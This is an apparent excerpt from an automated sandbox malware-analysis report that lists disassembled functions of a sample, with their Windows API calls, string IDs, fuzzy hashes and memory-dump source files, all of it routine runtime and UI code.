                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 3472027048-0
                                                                                    • Opcode ID: 01c8de7d1c52f1379436ba32370cb002541e89dbe2850501a5063f81bbc03de1
                                                                                    • Instruction ID: 18b38d09955f91067994ce57c2704c259faaba03eea283e8c2a7273f2993d898
                                                                                    • Opcode Fuzzy Hash: 01c8de7d1c52f1379436ba32370cb002541e89dbe2850501a5063f81bbc03de1
                                                                                    • Instruction Fuzzy Hash: E97132716043104BD315DF69C984B16BBD8AFC5315F1482BFE984AB3D2C7B8C901CB89
                                                                                    Function 005A2B7C Relevance: 12.1, APIs: 8, Instructions: 99windowthreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCapture.USER32 ref: 005A2BA2
                                                                                    • IsWindowUnicode.USER32 ref: 005A2BE5
                                                                                    • SendMessageW.USER32(00000000,-0000BBEE,00000000,?), ref: 005A2C00
                                                                                    • SendMessageA.USER32 ref: 005A2C1F
                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 005A2C2E
                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 005A2C3F
                                                                                    • SendMessageW.USER32(00000000,-0000BBEE,00000000,?), ref: 005A2C5F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSendWindow$ProcessThread$CaptureUnicode
                                                                                    • String ID:
                                                                                    • API String ID: 1994056952-0
                                                                                    • Opcode ID: 79780fc3bec1803b35e57a68d2ec923f4b549fb1d4fc9166e9bf7d30cdcaf988
                                                                                    • Instruction ID: 4dfba5f3d1d218beddb166fd502ba4ee7a64a30cf6ddade1315904ca74e7163d
                                                                                    • Opcode Fuzzy Hash: 79780fc3bec1803b35e57a68d2ec923f4b549fb1d4fc9166e9bf7d30cdcaf988
                                                                                    • Instruction Fuzzy Hash: 51219CB12046096FA620FA5DCA82FAF77DCEF06724F10842AF959C3242EA54FC509774
                                                                                    Function 00404504 Relevance: 10.9, APIs: 7, Instructions: 406COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 68bf383cb7f79b99f340bdf26841dbaafbf7dd31d34f85d7c5e7cd938e48f808
                                                                                    • Instruction ID: 291e5d107d462672790c1edf6ff7d0cc3542d77857f31f2adbac887a00927ee5
                                                                                    • Opcode Fuzzy Hash: 68bf383cb7f79b99f340bdf26841dbaafbf7dd31d34f85d7c5e7cd938e48f808
                                                                                    • Instruction Fuzzy Hash: 17C117A2B102010BD714AE7DDC8476EBA999BC5316F18827FF214EB3D6DA7CDD058348
                                                                                    Function 005F8EF4 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 216COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 005F8FDA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: PrivateProfileStringWrite
                                                                                    • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                                    • API String ID: 390214022-3304407042
                                                                                    • Opcode ID: 72d01abfe8e5969de7e26bb812fea71a54af99fa0a185ea00ff7a95313d2a991
                                                                                    • Instruction ID: 2223d5580d9881282453f8846468d4fa0c2eade89701c8d1d1552e55bc4b479c
                                                                                    • Opcode Fuzzy Hash: 72d01abfe8e5969de7e26bb812fea71a54af99fa0a185ea00ff7a95313d2a991
                                                                                    • Instruction Fuzzy Hash: A6811E34A0060DAFDF10EBA4C986BEEBBB5FF88304F504465E600B7291DB79AE45CB55
                                                                                    Function 00407368 Relevance: 10.6, APIs: 7, Instructions: 130threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00407828: GetCurrentThreadId.KERNEL32 ref: 0040782B
                                                                                    • GetTickCount.KERNEL32 ref: 0040739F
                                                                                    • GetTickCount.KERNEL32 ref: 004073B7
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 004073E6
                                                                                    • GetTickCount.KERNEL32 ref: 00407411
                                                                                    • GetTickCount.KERNEL32 ref: 00407448
                                                                                    • GetTickCount.KERNEL32 ref: 00407472
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 004074E2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountTick$CurrentThread
                                                                                    • String ID:
                                                                                    • API String ID: 3968769311-0
                                                                                    • Opcode ID: fa560ec336dd6435e73473a6e2aefd0ccb444b59d075b010f8b419752d8e835c
                                                                                    • Instruction ID: 7eaf3b8bd419559424612c501055e418296922ef1fbe2de70383ecb09e47f5c1
                                                                                    • Opcode Fuzzy Hash: fa560ec336dd6435e73473a6e2aefd0ccb444b59d075b010f8b419752d8e835c
                                                                                    • Instruction Fuzzy Hash: 67414F71A0C3559ED721AE38C48431FBFD1AB80354F14893EE8D8973C2E778A8859757
                                                                                    Function 005A2DDC Relevance: 10.6, APIs: 7, Instructions: 105windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PeekMessageW.USER32 ref: 005A2DF0
                                                                                    • IsWindowUnicode.USER32 ref: 005A2E04
                                                                                    • PeekMessageW.USER32 ref: 005A2E27
                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 005A2E3D
                                                                                    • TranslateMessage.USER32 ref: 005A2EC2
                                                                                    • DispatchMessageW.USER32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 005A2ECF
                                                                                    • DispatchMessageA.USER32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 005A2ED7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2190272339-0
                                                                                    • Opcode ID: fd761d7266132de43e7474990c2049500dae5730ede02df76ae55a535cf0bf77
                                                                                    • Instruction ID: d2fd1ee5a8e11b9fb307f93f8c6e517243e3696a9ac5cec3ed267a911c5f8ddb
                                                                                    • Opcode Fuzzy Hash: fd761d7266132de43e7474990c2049500dae5730ede02df76ae55a535cf0bf77
                                                                                    • Instruction Fuzzy Hash: AB21D63034434176EB31A92D0D47BBFAF9E6F97748F24441EF481DB282CAD698D68226
                                                                                    Function 005B2830 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91windowregistryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetActiveWindow.USER32(00000000,005B2942,?,?,?,00000001,00000000,?,00619EC3,0066978C,?,00650D35,?,?,00000000,00650DBE), ref: 005B285F
                                                                                    • GetFocus.USER32(00000000,005B2942,?,?,?,00000001,00000000,?,00619EC3,0066978C,?,00650D35,?,?,00000000,00650DBE), ref: 005B2867
                                                                                    • RegisterClassW.USER32 ref: 005B2888
                                                                                    • ShowWindow.USER32(00000000,00000008,00000000,00400000,00000000,41146400,00000000,00000000,00000000,00000000,80000000,00000000,00400000,00000000,00000000,00000000), ref: 005B2920
                                                                                    • SetFocus.USER32(00000000,00000000,005B2942,?,?,?,00000001,00000000,?,00619EC3,0066978C,?,00650D35,?,?,00000000), ref: 005B2927
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: FocusWindow$ActiveClassRegisterShow
                                                                                    • String ID: TWindowDisabler-Window
                                                                                    • API String ID: 495420250-1824977358
                                                                                    • Opcode ID: dc80fc215540cc4eafb9e960a5d421e476d6a1d8b1644f478aa1b5a7317f9f00
                                                                                    • Instruction ID: d82140f50c977c4be84b76ca69f426c0dffd831fcdb5b5c939c24f55dbe8d353
                                                                                    • Opcode Fuzzy Hash: dc80fc215540cc4eafb9e960a5d421e476d6a1d8b1644f478aa1b5a7317f9f00
                                                                                    • Instruction Fuzzy Hash: 1921D171B10701ABE320EF65DD02F9A7AE5FB45B04F504529F904FB2D0EAB8BC9087A5
                                                                                    Function 0063DBC0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 72fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 0063DBEC
                                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 0063DC05
                                                                                    • CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 0063DC2F
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0063DC4D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileHandle$AttributesCloseCreateModule
                                                                                    • String ID: GetFinalPathNameByHandleW$kernel32.dll
                                                                                    • API String ID: 791737717-340263132
                                                                                    • Opcode ID: 904617a2e49037e787060e302256d2bfdad1cab1979f73791d96504fdcffd84e
                                                                                    • Instruction ID: 6026778cd775b34b266e918d1895d9f5e5aeea77bfc3c582f4084562949ce8b5
                                                                                    • Opcode Fuzzy Hash: 904617a2e49037e787060e302256d2bfdad1cab1979f73791d96504fdcffd84e
                                                                                    • Instruction Fuzzy Hash: AD11A9A175030526E62032AA6CC7FBBA14E8B51758F14023ABA54D72D2EDD99D4282DA
                                                                                    Function 005B8F18 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDC.USER32 ref: 005B8F29
                                                                                      • Part of subcall function 004DD0C0: EnterCriticalSection.KERNEL32(?,00000000,004DD32F,?,?), ref: 004DD108
                                                                                    • SelectObject.GDI32(006125F0,00000000), ref: 005B8F4B
                                                                                    • GetTextExtentPointW.GDI32(006125F0,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,?), ref: 005B8F5F
                                                                                    • GetTextMetricsW.GDI32(006125F0,?), ref: 005B8F81
                                                                                    • ReleaseDC.USER32(00000000,006125F0), ref: 005B8F9E
                                                                                    Strings
                                                                                    • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 005B8F56
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Text$CriticalEnterExtentMetricsObjectPointReleaseSectionSelect
                                                                                    • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                                    • API String ID: 1334710084-222967699
                                                                                    • Opcode ID: 958775d07e3e9b45620c2f21b6b018f80563130afb076ad44b94cc2abff4fe22
                                                                                    • Instruction ID: 51f75fe6070d711ca219fc08ac8bc05be8c07b0fd7becc7a938aa07a23ceff98
                                                                                    • Opcode Fuzzy Hash: 958775d07e3e9b45620c2f21b6b018f80563130afb076ad44b94cc2abff4fe22
                                                                                    • Instruction Fuzzy Hash: 28016D76B14608AFDB01DBE9CD41EEEB7BDEB49714F500466BA00D3281DAB8AD10C764
                                                                                    Function 004083B0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000), ref: 004083E9
                                                                                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000), ref: 004083EF
                                                                                    • GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000), ref: 0040840A
                                                                                    • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000), ref: 00408410
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileHandleWrite
                                                                                    • String ID: Error$Runtime error at 00000000
                                                                                    • API String ID: 3320372497-2970929446
                                                                                    • Opcode ID: 92e6fdd24f1f60eb182b72c0aadb941e414bd13305f3c1d9f226be0fde595ab1
                                                                                    • Instruction ID: 8a17602c2e75a12023cfcc5c7f70c251d3057b547bf485000fb7f9983d30ebe3
                                                                                    • Opcode Fuzzy Hash: 92e6fdd24f1f60eb182b72c0aadb941e414bd13305f3c1d9f226be0fde595ab1
                                                                                    • Instruction Fuzzy Hash: 1AF046B0640341B9E720BB616D07F1A3A4D4740F26F00053FF550B93C2DEFA4A88836D
                                                                                    Function 0042CB08 Relevance: 9.1, APIs: 6, Instructions: 144COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0042CBBD
                                                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0042CBD9
                                                                                    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0042CC12
                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0042CC8F
                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0042CCA8
                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 0042CCE3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
